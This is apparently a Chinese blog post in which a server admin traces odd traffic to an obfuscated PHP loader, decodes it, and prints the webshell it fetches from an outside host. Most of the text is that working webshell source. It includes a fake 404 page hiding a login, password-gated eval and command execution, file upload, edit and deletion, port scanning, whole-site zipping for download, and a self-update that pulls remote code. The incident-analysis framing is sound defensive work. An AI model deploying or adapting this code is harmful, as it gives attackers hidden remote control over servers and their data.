晚上客户反映服务器最近流量有些异常,于是就去查看服务器日志,为了自身方便,写了一个文件来查询
<?php
$ua_file = "ua.txt";
$ua_data = date("Y/m/d H:i:s")."----".$_SERVER['REMOTE_ADDR']."\n";
$ua_data = $ua_data."http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."\n";
$ua_data = $ua_data.$_SERVER['HTTP_USER_AGENT']."\n";
$ua_data = $ua_data.$_SERVER['HTTP_REFERER']."\n";
$ua_data = $ua_data."\n";
$ffff = fopen($ua_file, 'a');
fwrite($ffff, $ua_data);
fclose($ffff);
?>
可是其中的一请求的文件引起了我的注意,直接打开看看~
<?php
define('iphp','oday');
define('T','H*');
define('A','call');
define('B','user');
define('C','func');
define('D','create');
define('E','function');
define('F','file');
define('F1','get');
define('F2','contents');
define('P','pack');
$p = P;
$call = sprintf('%s_%s_%s',A,B,C);
$create = sprintf('%s_%s',D,E);
$file = sprintf('%s_%s_%s',F,F1,F2);
$t = array('6','8','7','4','7','4','7','0','3','a','2','f','2','f','6','4','6','f','6','4','6','f','6','4','6','f','6','d','6','5','2','e','7','3','6','9','6','e','6','1','6','1','7','0','7','0','2','e','6','3','6','f','6','d','2','f','6','7','6','5','7','4','6','3','6','f','6','4','6','5','2','e','7','0','6','8','7','0','3','f','6','3','6','1','6','c','6','c','3','d','6','3','6','f','6','4','6','5');
$call($create(null,$p(T,$file($p(T,join(null,$t))))));
?>
于是随手解密了下,发现函数的原型是这样子的
<?php
define('iphp','oday');
define('T','H*');
define('A','call');
define('B','user');
define('C','func');
define('D','create');
define('E','function');
define('F','file');
define('F1','get');
define('F2','contents');
define('P','pack');
$p = P; //pack
//明显的对函数进行拼接
$call = sprintf('%s_%s_%s',A,B,C); //call_user_func 调用自定义的函数
$create = sprintf('%s_%s',D,E); //create_function 创建自定义函数
$file = sprintf('%s_%s_%s',F,F1,F2); //file_get_contents 远程文件读取
$t = array('6','8','7','4','7','4','7','0','3','a','2','f','2','f','6','4','6','f','6','4','6','f','6','4','6','f','6','d','6','5','2','e','7','3','6','9','6','e','6','1','6','1','7','0','7','0','2','e','6','3','6','f','6','d','2','f','6','7','6','5','7','4','6','3','6','f','6','4','6','5','2','e','7','0','6','8','7','0','3','f','6','3','6','1','6','c','6','c','3','d','6','3','6','f','6','4','6','5');
//$call($create(null,$p(T,$file($p(T,join(null,$t))))));
//join(null,$t) join() 函数把数组元素组合为一个字符串
call_user_func(create_function(null,pack(H*,file_get_contents(H*,join(null,$t)))));
?>
其中的join(null,$t)得到的是
687474703a2f2f646f646f646f6d652e73696e616170702e636f6d2f676574636f64652e7068703f63616c6c3d636f6465
然后$p(T,join(null,$t));的到的结果是
http://dododome.sinaapp.com/getcode.php?call=code
那么一目了然了,从http://dododome.sinaapp.com/getcode.php?call=code读取到的东西,经过pack解码,然后直接调用
//<?php
// +----------------------------------------------------------------------
// | Copyright (c) 2006-2012 KingBin All rights reserved.
// +----------------------------------------------------------------------
// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
// +----------------------------------------------------------------------
// | Author: KingBin ooooooo.oooo.ooooooo@foxmail.com
// +----------------------------------------------------------------------
error_reporting(0);
define('KING_SELF', basename($_SERVER["SCRIPT_FILENAME"]));
define('IS_WIN', 'win' == substr(strtolower(PHP_OS), 0, 3));
defined('mamashuoanquangoushigehenrongyiguodedashaguaruanjian') or define('mamashuoanquangoushigehenrongyiguodedashaguaruanjian', 'demo');
date_default_timezone_set('asia/shanghai');
//新增过狗验证
if(defined('iphp'))
define('_pass_',iphp);
else
define('_pass_',mamashuoanquangoushigehenrongyiguodedashaguaruanjian);
//结束
if (!isset($_SESSION)) {
session_start();
}
function init() {
remote_e();
header("Content-type:text/html;charset=utf-8");
session();
//update();
$do = new king;
$do->start();
}
function remote_e() {
$pass = $_REQUEST['pass'];
$e = $_REQUEST['e'];
if ($pass == _pass_) {
if ($e)
eval($e);
die;
}
}
function _getcwd() {
return $_SESSION['dirpath'] . '/';
}
function kill($process) {
$wmi = new COM("Winmgmts:/root/cimv2");
$data = $wmi->ExecQuery(sprintf("SELECT * FROM Win32_Process Where Name='%s'", $process));
foreach ($data as $v) {
$v->Terminate();
}
}
function session() {
$sessid = empty($_COOKIE[session_name()]) ? $_COOKIE[session_name()] : null;
if ($sessid)
session_id($sessid);
}
function update() {
$code = "<?php
session_start();
define('version','v2');
define('pp', '{pass}');
if(isset(\$_SESSION['k'])){
\$k = \$_SESSION['k'];
}else{
\$_SESSION['k'] = pack('H*',file_get_contents(pack('H*','687474703a2f2f66696c652e6865696c6979752e636f6d2f676574636f64652e7068703f63616c6c3d636f6465')));
\$k = \$_SESSION['k'];
}
call_user_func(create_function(null,\$k));
?>
";
$pass = _pass_;
$contents = str_replace('{pass}', $pass, $code);
if (!defined('version') || version != 'v2') {
file_put_contents(KING_SELF, $contents);
//header('location:' . KING_SELF);
}
}
function I($name) {
return $_REQUEST[$name];
}
//已经废弃
function _king($key) {
$opts = array('http' => array('method' => 'GET', 'timeout' => 10));
$context = stream_context_create($opts);
if (isset($_SESSION['code'])) {
$code = bin::decode($_SESSION['code'], $key);
} else {
$_SESSION['code'] = $GLOBALS['p']('H*', $GLOBALS['f']($GLOBALS['s']('%s/%s', $GLOBALS['p']
('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f'), $key)), false, $context);
$code = $GLOBALS['s']('%s', @bin::decode($_SESSION['code'], $key));
}
//这里很重要针对5.3 以上匿名优化
$GLOBALS['c']($GLOBALS['e'](false, $code));
}
//end
function css() {
$code = <<< css
<style>
input{font:11px Verdana;height:18px;border:1px solid #666666;}a{color:#00f;text-decoration:underline;}a:hover{color:#f00;text-decoration:none;}#header{height:20px;border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;}#header .left{float:left;}#header .right{float:right;}#menu{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}#content{margin:0 auto;width:98%;}#content h2{margin-top:15px;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}#content #base,#content #base2{background:#eee;margin-bottom:10px;}#base input{float:right;border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;margin:5px 10px;}.cdrom{padding:5px;margin:auto 7px;}.h{margin-top:8px;}#base2 .input{font:12px Arial,Tahoma;background:#fff;border:1px solid #666;padding:2px;height:18px;}#base2 .bt{border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}dl,dt,dd{margin:0;}.focus{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;}.fff{background:#fff}dl{margin:0 auto;width:100%;}dt,dd{overflow:hidden;border-top:1px solid white;border-bottom:1px solid #DDD;background:#F1F1F1;padding:5px 15px 5px 5px;}dt{border-top:1px solid white;border-bottom:1px solid #DDD;background:#E9E9E9;font-weight:bold;padding:5px 15px 5px 5px;}dt span,dd span{width:19%;display:inline-block;text-indent:0em;overflow:hidden;}#footer{padding:10px 30px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;}#load{position:fixed;right:0;border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;display:none;}.in{width:40px;text-align:center;}.high{background-color:#0449BE;color:white;margin:0 2px;padding:2px 3px;width:10px;}.high2{margin:0 2px;padding:2px 0px;width:10px;}#login{display:none;}#show_file{padding: 10px 10px;border: #000 solid;color:#000;height:400px;width:800px;position:fixed;top:45%;left:50%;margin-top:-200px;margin-left:-400px;background:#fff;overflow:auto;}#open,#upload{display:none;position:fixed;top:45%;left:50%;margin-top:-200px;margin-left:-400px;}#close{color:#fff;height:16px;width:30px;position:absolute;right:0;background:#000;z-index:1;}#upfile{width:628px;height:108px;padding:10px 20px;background-color:white;position:fixed;top:45%;left:50%;margin-top:-54px;margin-left:-314px;border:#000 solid;}
#login{display:none;}
body{font:14px Arial,Tahoma;line-height:16px;margin:0;padding:0;}
h1{display: block;font-size: 32px;font-weight: bold;font-family:none;}
.not_found{margin:20px 20px;}
.not_found p{font-family:none;font: 14px Arial,Tahoma;line-height: 16px;}
in{border:1px;}
.red{color:#FF0085;}
#base2 .input{width:260px;}
.hide{display:none;}
.showfile {font-size: 16px;line-height: 28px;}
</style>
css;
return $code;
}
function js() {
$code = <<< js
<script>
(function() {
function _key() {
$(document).keydown(function(e) {
var key = (e.keyCode) || (e.which) || (e.charCode);
if (key == 80) {
$(".not_found").hide();
$("#login").show();
}
});
}
function error(msg, element, speed) {
speed = speed || "3000";
//setTimeout('$(element).show("slow")',speed);
$(element).show();
$(element).text(msg);
setTimeout(
function() {
$(element).hide();
}
, speed);
}
function post(element, url, form) {
$(element).click(function() {
$.get(url, $(form).serialize(), function(data) {
if (data.status == 100) {
error(data.msg, '#notice', 2000);
}else{
$("body").html(data.html);
//bind default event
_init();
}
}, "json");
});
}
function close(){
$("#close").click(function(){
$("#open").hide();
});
$("#close_file").click(function(){
$("#upfile").hide();
});
}
function get(element){
$(element).on('click',function(e){
$.get(this.href,function(data){
if(data == null){
error('权限不足,无法查看!', '#load', 2000);
}
if(data.showfile){
$("#open").show();
$('#show_file').empty();
$('#show_file').append(data.showfile);
}
if(data.editfile){
if($(window).scrollTop()>0) $('body,html').animate({scrollTop:0},1000);
$(".newfile").show();
$(".newfile_name").empty();
$(".newfile_name").val(data.filename);
$(".newfile_value").empty();
$(".newfile_value").text(data.editfile);
}
if(data.html) {
$("body").html(data.html);
//bind default event
_init();
}
if(data.msg){
error(data.msg, '#load', 2000);
}
if(data.status==200){
//window.location.href={gourl}
window.location.reload();
}
},"json");
e.preventDefault();
return false;
});
return false;
}
function find(){
$('.qh').click(function(){
var find = $('.find').val();
if( find == null){
error('切换的路径不能为空', '#load', 2000);
}
$.get('?action=find&file='+find,function(data){
if(data == null){
error('切换的路径不能为空!', '#load', 2000);
}
if(data.html) {
$("body").html(data.html);
//bind default event
_init();
}
if(data.msg){
error(data.msg, '#load', 2000);
}
},"json");
});
}
function port(){
$(".click_port").click(function(){
$('.port_hide').toggle();
$(".findport").click(function(){
error("正在扫描端口,请耐心等待", '#load', 2000);
var port = $('.port').val();
$.get('?action=port&ports='+port,function(data){
if(data.showfile){
$("#open").show();
$('#show_file').empty();
$('#show_file').append(data.showfile);
}
if(data.msg){
error(data.msg, '#load', 2000);
}
},"json");
});
});
}
function upload(){
$('.upload').click(function(){
$('#upfile').toggle();
});
$(".postfile").click(function(){
$('#upfile').hide();
$("#form1").submit();
});
}
function runphp(){
$(".run_php").click(function(){
$('.runphp_hide').toggle();
$(".runphp_click").click(function(){
error("正在执行php代码,请耐心等待", '#load', 2000);
var port = $('.runphp_value').val();
$.get('?action=runphp&codes='+port,function(data){
if(data.showfile){
$("#open").show();
$('#show_file').empty();
if(data.showfile==null){
error("语句执行错误,或者执行的函数被禁用!", '#load', 2000);
}
$('#show_file').append(data.showfile);
}
if(data.msg){
error(data.msg, '#load', 2000);
}
},"json");
});
});
}
function run_command(){
$(".run_command").click(function(){
$('.runcommand_hide').toggle();
$(".runcommand_click").click(function(){
error("正在执行命令,请耐心等待", '#load', 2000);
var port = $('.runcommand_value').val();
$.get('?action=runcommand&codes='+port,function(data){
if(data.showfile){
$("#open").show();
$('#show_file').empty();
if(data.showfile){
error("命令执行成功!", '#load', 2000);
$('#show_file').append('<pre>'+data.showfile+'</pre>');
}
}
if(data.msg){
error(data.msg, '#load', 2000);
}
},"json");
});
});
}
function newfile(){
$("._newfile").click(function(){
$(".newfile").toggle();
});
$(".newfile_click").click(function(){
var name = $(".newfile_name").val();
var contents = $(".newfile_value").val();
if(name==''){
error("新建文件不能为空!", '#load', 2000);
return false;
}
if(contents==''){
error("新建内容不能为空!", '#load', 2000);
return false;
}
if(name && contents){
$.post('?action=createfile',{file:name,body:contents},function(data){
if(data.html) {
$("body").html(data.html);
//bind default event
_init();
}
if(data.msg){
error(data.msg, '#load', 2000);
}
},"json");
}
});
}
function newfolder(){
$("._newfolder").click(function(){
$(".newfolder").toggle();
});
$(".newfolder_click").click(function(){
var name = $(".newfolder_name").val();
if(name==''){
error("新建文件夹不能为空!", '#load', 2000);
return false;
}
if(name){
$.post('?action=newfolder',{file:name},function(data){
if(data.html) {
$("body").html(data.html);
//bind default event
_init();
}
if(data.msg){
error(data.msg, '#load', 2000);
}
},"json");
}
});
}
function pay(){
$('.pay').click(function(){
alert('付费模块正在努力制作中!');
});
}
function _init() {
$(function($) {
_key();
url = $("#submit").attr('data_url');
post('#submit',url, '#f_login');
get('.action_del');
close();
find();
port();
runphp();
upload();
run_command();
newfile();
newfolder();
pay();
$('.packages').click(function(){
error('打包时间比较长,请耐心等待。。或者进行其他操作。。', '#load', 5000);
});
});
}
_init();
})();
</script>
js;
return $code;
}
function _html() {
$code = <<< CODE
<!DOCTYPE HTML>
<head>
<meta http-equiv="content-type" content="text/html" />
<meta http-equiv="content-type" charset="UTF-8" />
<title>404 Not Found</title>
{load_css}
<script src="http://lib.sinaapp.com/js/jquery/1.8/jquery.min.js"></script>
{load_js}
</head>
<body>
<div id="notice" style="position:fixed;right:0;border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;display: none; font-size:12px;"></div>
<div class="not_found">
<h1>Not Found</h1>
<p>The requested URL /{url} was not found on this server.</p>
</div>
<div id="login">
<form action="" method="GET" id="f_login">
<span style="font:11px Verdana;">
Password:
</span>
<input id="pwd" name="password" type="password" size="20" />
<input id="submit" data_url="{url}" type="button" value=" login " />
</form>
</div>
</body>
</html>
CODE;
return str_replace(array(
'{url}',
'{load_css}',
'{load_js}'), array(
KING_SELF,
css(),
js()), $code);
}
function class_html() {
$code = <<< code
<!DOCTYPE HTML>
<head>
<meta http-equiv="content-type" content="text/html" />
<meta http-equiv="content-type" charset="UTF-8" />
<title>404 Not Found</title>
{load_css}
<script src="http://lib.sinaapp.com/js/jquery/1.8/jquery.min.js"></script>
{load_js}
</head>
<body>
{body}
</body>
</html>
code;
return $code;
}
function class_body() {
$code = <<< code
<div id="load">
</div>
<div class='hide' id="upfile">
<p></p><p></p><p><a href="javascript:;;;" id="close_file">点我关闭</a></p>
<form action="?action=upload" id="form1" name="form1" encType="multipart/form-data" method="post" target="hidden_frame">
<input name="action" value="upload" type="hidden" />
<input type="file" id="userfile" name="userfile">
<INPUT class="postfile" type="button" value="上传文件">
<iframe name="hidden_frame" id="hidden_frame" style="display:none"></iframe>
</form>
</div>
<div id="open">
<div style="position:relative;">
<div id="close">关闭</div>
</div>
<div id="show_file" class="showfile">
</div>
</div>
<div id="header">
<div class="left">
{host}({ip})
</div>
<div class="right">
OS:{uname} {software} php {php_version}
</div>
</div>
<div id="menu">
{menu}
</div>
<div id="content">
<h2>文件管理 - 当前磁盘空间 <span id="disktotal">{space_total}</span> 运行用户:{whoami}</h2>
<div id="base">
<div class="cdrom">
<span id="listdir"> {current_dir}</span>
</div>
<div class="cdrom">
{all_dir}
</div>
</div>
<div class="h"></div>
<div id="base2">
<div class="cdrom">
{action}
</div>
<div class="cdrom">
切换路径: <input class="input find" name="findstr" value="" type="text" /> <input class="bt qh" value="切换" type="submit" />
</div>
<div class="cdrom runcommand_hide hide">
运行命令: <input class="input runcommand_value" name="runphp" value="" type="text"/> <input class="bt runcommand_click" value="运行" type="submit" />
</div>
<div class="cdrom port_hide hide">
扫描端口: <input class="input port" name="findstr" value="21,22,25,80,3306,9000,11211" type="text" /> <input class="bt findport" value="扫描" type="submit" />
</div>
<div class="cdrom runphp_hide hide">
运行php: <textarea class="input runphp_value" name="runphp" value="" type="text" style="width:600px;height:200px;"/></textarea> <input class="bt runphp_click" value="运行" type="submit" />
</div>
<!--new file -->
<div class="cdrom hide newfile">
新建文件: <input class="input newfile_name" style="font-size:16px;color:blue;" name="findstr" value="" type="text" />
<div style="margin-top:10px;">
新建内容: <textarea class="input newfile_value" name="runphp" value="" type="text" style="width:600px;height:200px;font-size:16px;color:blue;line-height: 28px;"/></textarea>
<input class="bt newfile_click" value="新建" type="submit" />
</div>
</div>
<!--end-->
<div class="cdrom hide newfolder">
新文件夹: <input class="input newfolder_name" name="findstr" value="" type="text" />
<input class="bt newfolder_click" value="新建" type="submit" />
</div>
</div>
<!-- return -->
<div id="show">
<dl>
<dt>
<span class="in"> </span>
<span>文件名</span>
<span>修改时间</span>
<span>文件大小</span>
<span>权限</span>
<span>操作</span>
</dt>
<dd >
<span class="in">
-
</span>
<span>
<a class='action_del' href="?action=up">返回上一目录</a>
</span>
<span></span>
<span></span>
<span></span>
<span></span>
</dd>
<!-- file -->
{showfile}
<!-- file end -->
</dl>
</div>
<!-- page start-->
<!-- end -->
</div>
<div class="h"></div>
<div id="footer">
当前版本:2.0 一句话连接提供 {http}/{k}?pass={p} 密码是e</span>
</div>
code;
return str_replace(array('{http}', '{k}', '{p}'), array($_SERVER["HTTP_HOST"], KING_SELF, _pass_), $code);
}
function show_html() {
$code = <<< code
<dd class="{color}" onmouseover="this.className='focus'" onmouseout="this.className='{color}'">
<span class="in">
<input name="" type="checkbox">
</span>
<span>
<a class="action_del {.red}" href="{self}?action=view&file={file}" name="" >{return_file}</a>
</span>
<span>
<a href="javascript:;;;" name="" >{return_time}</a>
</span>
<span>{return_size}</span>
<span>
<a href="javascript:;;;" name="" >{return_chmod}</a> /
<a href="javascript:;;;" name="">{return_perms}</a>
</span>
<span>
{is_folder}
</span>
</dd>
code;
return $code;
}
function pages() {
$code = <<< code
<div id="pages">
<dl>
<dd>
<span class="in"> </span>
<span></span>
<span></span>
<span></span>
<span style="text-align:right;width:38%">
<a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_file&page=1" >Index</a>
<a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_file&page=$previous" >Previous</a>
{pages}
<a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_file&page=$next" >Next</a>
<a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_file&page=$nums" >End</a>
</dd>
</dl>
</div>
code;
}
function _login() {
$password = I('password');
//去掉原有key保护改为用户自定义密码[服务端已修改]
//&& NULL == bin::decode($GLOBALS['p']('H*', $GLOBALS['f']($GLOBALS['s']('%s/%s', $GLOBALS['p']('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f'), $key))), $key)
if (isset($password) && $password !=_pass_) {
die('{"status":"100","msg":"密码不对"}');
}
echo _html();
}
function _logout() {
setcookie(session_name(),null, time() - 86400);
session_destroy();
}
function is_ajax() {
if (strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest')
return true;
}
function run() {
$action = new run();
$action->index();
}
function _is_login() {
$cookie = !empty($_SESSION['_king_key']) ? pack('H*', $_SESSION['_king_key']) : null;
$key = I('password') ? I('password') : $cookie;
if (_pass_ == $key) {
if ($_SESSION['_king_key'] != bin2hex(_pass_)) {
//setcookie('_king_key', bin2hex($key), time() + 86400);
setcookie(session_name(), session_id(), time() + 86400);
$_SESSION['_king_key'] = bin2hex($key);
}
run();
} else
_login();
}
class run {
function index() {
$action = I('action') ? I('action') : null;
if (isset($action)) {
if (method_exists($this, $action))
$this->$action();
} else {
$this->dump();
}
}
function restart() {
if (!IS_WIN) {
die('{"msg":"非常抱歉,此操作仅限windows系统"}');
}
if (!class_exists('COM')) {
die('{"msg":"非常抱歉,此机器不支持重启"}');
}
//尝试重启
kill('services.exe');
die('{"msg":"正在尝试重启服务器系统,如不是system权限请放弃操作!"}');
}
function find() {
$dir = $this->gbk_mbstring(I('file'));
if (is_dir($dir)) {
$this->setpath($dir);
$this->dump();
}
}
function hello() {
$i = I('world');
if ($i) {
eval($i);
}
exit;
}
function createfile() {
$filename = I('file');
$contents = I('body');
if (isset($filename) && isset($contents)) {
if (true == file_put_contents(_getcwd() . $filename, $contents)) {
$this->dump('新建文件成功!');
} else {
$this->dump('新建文件失败!');
}
}
}
function newfolder() {
$filename = I('file');
if (isset($filename)) {
if (is_dir(_getcwd() . $filename)) {
die('{"msg":"文件夹已经存在"}');
}
if (true == mkdir(_getcwd() . $filename, 0777)) {
$this->dump('新建文件夹成功!');
} else {
$this->dump('新建文件夹失败!');
}
}
}
function editfile(){
if(IS_WIN)
$filename = I('file') ? $this->gbk_mbstring(pack("H*", I('file'))) : null;
else
$filename = I('file') ? $this->mbstring(pack("H*", I('file'))) : null;
if (is_file($filename)) {
ob_start();
echo file_get_contents($filename);
$contents = ob_get_clean();
echo sprintf('{"editfile":%s,"filename":"%s"}', json_encode($this->mbstring($contents)),basename($filename));
}
}
function rmdir() {
if(IS_WIN)
$dir = I('file') ? $this->gbk_mbstring(pack("H*", I('file'))) : null;
else
$dir = I('file') ? $this->mbstring(pack("H*", I('file'))) : null;
$files = array_diff(scandir($dir), array('.', '..'));
foreach ($files as $file) {
(is_dir("$dir/$file")) ? $this->rmdir("$dir/$file") : unlink("$dir/$file");
}
if(true==rmdir($dir)){
$this->dump('文件夹删除成功!');
}else{
die('{"msg":"文件夹删除失败!"}');
}
}
function phpinfo() {
$html = <<< code
<pre>
php参数查看
======================================
禁用的函数:
{disable_function}
禁用的类 :{class}
支持的拓展 :
{ext}
加载的项目 : {include}
前置调用 : {pre}
后置调用 :{next}
内存设置大小 : {mem}
php.ini 路径 : {php}
最大上传 : {u}
=======================================
code by blackbin
</pre>
code;
$dis = ini_get('disable_functions');
$ext = join(',', get_loaded_extensions());
$in = ini_get('include_path');
$mem = ini_get('memory_limit');
$class = ini_get('disable_classes');
$php = php_ini_loaded_file();
$u = ini_get('upload_max_filesize');
$pre = ini_get('auto_prepend_file');
$next = ini_get('auto_append_file');
$code = str_replace(array(
'{disable_function}',
'{ext}',
'{include}',
'{mem}',
'{class}',
'{php}',
'{u}',
'{pre}',
'{next}'), array(
str_replace(',', '<br/> ', $dis),
str_replace(',', '<br/> ', $ext),
$in,
$mem,
$class,
$php,
$u,
$pre,
$next), $html);
die(sprintf('{"showfile":%s}', json_encode($code)));
}
function port() {
$port = explode(',', I('ports'));
foreach ($port as $v) {
if (true == $this->fsockopen($v)) {
$yes[] = $v;
} else {
$no[] = $v;
}
}
$html = <<< code
<pre>
端口检测
=======================
服务器开放端口:{yes}
服务器关闭端口:{no}
=======================
</pre>
code;
$code = str_replace(array('{yes}', '{no}'), array(join(',', $yes), join(',', $no)), $html);
die(sprintf('{"showfile":%s}', json_encode($code)));
}
function fsockopen($port) {
$fp = fsockopen("127.0.0.1", $port, $errno, $errstr, 1);
if (!$fp) {
return false;
}
return true;
}
function runphp() {
$codes = I('codes');
ob_start();
eval($codes);
$c = ob_get_clean();
die(sprintf('{"showfile":%s}', json_encode($c)));
}
function runcommand() {
$codes = I('codes');
ob_start();
echo `$codes`;
$c = ob_get_clean();
die(sprintf('{"showfile":%s}', json_encode($this->mbstring($c))));
}
function viewinfo() {
phpinfo();
exit;
}
function logout() {
_logout();
header('location:http://'.$_SERVER["HTTP_HOST"].'/'.KING_SELF);
die('{"status":"200","msg":"你已成功退出!"}');
}
function del() {
if (IS_WIN)
$file = I('file') ? $this->gbk_mbstring(pack("H*", I('file'))) : null;
else
$file = I('file') ? $this->mbstring(pack("H*", I('file'))) : null;
if (isset($file)) {
if (false == unlink($file)) {
die('{"msg":"对不起,您没有删除此文件的权限!"}');
} else {
$this->dump('成功删除文件!');
}
}
return;
}
function down() {
if (IS_WIN)
$filename = I('file') ? $this->gbk_mbstring(pack("H*", I('file'))) : null;
else
$filename = I('file') ? $this->mbstring(pack("H*", I('file'))) : null;
if (isset($filename)) {
if (file_exists($filename)) {
$this->download($filename);
}
}
return;
}
function linuxpkg() {
if (IS_WIN)
die('{"msg":"此功能仅限linux平台使用"}');
$disable_functions = ini_get('disable_functions');
if (strpos($disable_functions, 'shell_exec')) {
die('{"msg":"非常抱歉,命令行已被禁用,请使用左边的打包功能!"}');
}
$apath = pack('H*', $this->scriptroot());
$path = $_SESSION['dirpath'];
$shell = sprintf('tar zcf %s.tar.gz %s', md5(uniqid()), $path);
shell_exec($shell);
$this->setpath($apath);
$this->dump('亲,恭喜您,打包成功!');
}
function packages() {
if (!class_exists('ZipArchive')) {
die('{"msg":"当前环境不支持打包!"}');
}
$c = $this->_scandir($this->mbstring($_SESSION['dirpath']));
array_walk_recursive($c, array($this, 'tofile'));
$res = $this->addzip();
if ($res) {
//返回打包路径
$apath = pack('H*', $this->scriptroot());
$this->setpath($apath);
$this->dump('亲,恭喜您,打包成功!');
}
}
function up() {
$path = !empty($_SESSION['dirpath']) ? $_SESSION['dirpath'] : $this->basedir();
$_SESSION['dirpath'] = str_replace('\\', '/', $this->setpath(dirname($path)));
$this->dump();
}
//区分windows编码 windows gbk
function view() {
if (IS_WIN)
$filename = I('file') ? $this->gbk_mbstring(pack("H*", I('file'))) : null;
else
$filename = I('file') ? $this->mbstring(pack("H*", I('file'))) : null;
if (is_dir($filename)) {
$this->setpath($filename);
$this->dump();
}
if (is_file($filename)) {
ob_start();
show_source($filename);
$contents = ob_get_clean();
echo sprintf('{"showfile":%s}', json_encode($this->mbstring($contents)));
}
}
function upload() {
$path = !empty($_SESSION['dirpath']) ? $_SESSION['dirpath'] : $this->basedir();
if (true == @file_put_contents($path . '/' . basename($_FILES['userfile']['name']), file_get_contents($_FILES['userfile']['tmp_name']))) {
exit('
<script>
parent.$("#load").show();
parent.$("#load").text("上传成功,刷新当前页面即可!");
setTimeout(
function() {
parent.$("#load").hide();
}
, 2000);
</script>');
} else {
exit('<script>
parent.$("#load").show();
parent.$("#load").text("上传失败!");
setTimeout(
function() {
parent.$("#load").hide();
}
, 2000);
</script>');
}
}
protected function dump($msg = null) {
if (is_ajax()) {
$this->dump_ajax($msg);
} else {
$this->dump_html();
}
}
//start
function _scandir($path) {
$path = $this->gbk_mbstring($path);
$class = new DirectoryIterator($path);
foreach ($class as $key => $fileinfo) {
if ($fileinfo->getFilename() == '.' || $fileinfo->getFilename() == '..')
continue;
if ($fileinfo->isFile()) {
$files[] = $this->mbstring($path) . '/' . $this->mbstring($fileinfo->
getFilename());
}
if ($fileinfo->isDir()) {
$dirs[] = $this->_scandir($path . '/' . $fileinfo->getFilename());
}
}
if (!isset($files))
$files = array();
if (!isset($dirs))
$dirs = array();
$return = array_merge($dirs, $files);
return $return;
}
function trimpath($path) {
return str_replace('\\', '/', $path);
}
function tofile($item, $key) {
$GLOBALS['addzips'][] = array('pathname' => $item, 'filename' => ltrim(str_replace
($this->trimpath(dirname(__file__)), null, $item), '/'));
}
function addzip() {
set_time_limit(0);
$basename = md5(uniqid()) . '.zip';
$zip = new ZipArchive;
if (!is_file($basename))
$res = $zip->open($basename, ZipArchive::CREATE);
else
$res = $zip->open($basename);
if ($res === true) {
foreach ($GLOBALS['addzips'] as $add) {
if (basename($add['pathname']) == $basename)
continue;
$zip->addFile($this->gbk_mbstring($add['pathname']), $this->gbk_mbstring($add['filename']));
}
$zip->close();
} else {
die('{"msg":"不能创建打包程序,可能是目录没有读写权限!"}');
}
return true;
}
//end
function download($filename) {
set_time_limit(0);
$file = new SplFileObject($filename);
header("Cache-Control: no-cache, must-revalidate");
header("Pragma: no-cache");
header("Content-Disposition: attachment; filename=" . $file->getbasename());
header("Content-Length: " . $file->getsize());
header("Content-Type: application/force-download");
header('Content-Description: File Transfer');
header('Content-Encoding: none');
header("Content-Transfer-Encoding: binary");
while (!$file->eof()) {
echo $file->fgets();
}
}
protected function dump_ajax($msg = null) {
if ($msg) {
echo sprintf("{\"html\":%s,\"msg\":\"%s\"}", $this->ajax(), $msg);
} else {
echo sprintf("{\"html\":%s}", $this->ajax());
}
}
protected function dump_html() {
$html = $this->html();
$menu = join(" | ", $this->menu());
$action = join(" | ", $this->action());
echo str_replace(array("{menu}", "{action}"), array($menu, $action), $html);
}
protected function is_utf8($str) {
$c = 0;
$b = 0;
$bits = 0;
$len = strlen($str);
for ($i = 0; $i < $len; $i++) {
$c = ord($str[$i]);
if ($c > 128) {
if (($c >= 254))
return false;
elseif ($c >= 252)
$bits = 6;
elseif ($c >= 248)
$bits = 5;
elseif ($c >= 240)
$bits = 4;
elseif ($c >= 224)
$bits = 3;
elseif ($c >= 192)
$bits = 2;
else
return false;
if (($i + $bits) > $len)
return false;
while ($bits > 1) {
$i++;
$b = ord($str[$i]);
if ($b < 128 || $b > 191)
return false;
$bits--;
}
}
}
return true;
}
protected function byte_format($size, $dec = 2) {
$a = array(
"B",
"KB",
"MB",
"GB",
"TB",
"PB");
$pos = 0;
while ($size >= 1024) {
$size /= 1024;
$pos++;
}
return round($size, $dec) . "" . $a[$pos];
}
protected function html() {
return str_replace(array(
'{body}',
'{load_css}',
'{load_js}'), array(
$this->body(),
css(),
js()), class_html());
}
protected function ajax() {
$html = $this->body();
$menu = join(" | ", $this->menu());
$action = join(" | ", $this->action());
$body = str_replace(array("{menu}", "{action}"), array($menu, $action), $html);
return json_encode($body);
}
protected function body() {
return str_replace(array(
'{host}',
'{ip}',
'{uname}',
'{software}',
'{php_version}',
'{whoami}',
'{current_dir}',
'{space_total}',
'{all_dir}',
'{showfile}',
), array(
$this->host(),
$this->ip(),
$this->uname(),
$this->soft(),
$this->php_version(),
$this->whoami(),
$this->current_dir(),
$this->space_total(),
$this->all_dir(),
$this->showfile(),
), class_body());
}
protected function menu() {
if (IS_WIN) {
$restart = array(
"重启系统",
KING_SELF . "?action=restart",
'action_del');
} else {
$restart = null;
$unset = true;
}
$menus = array(
array(
"退出",
KING_SELF . "?action=logout",
null),
array(
"运行命令",
'javascript:;;;',
'run_command'),
array(
"端口扫描",
'javascript:;;;',
'click_port'),
array(
"运行php",
'javascript:;;;',
'run_php'),
array(
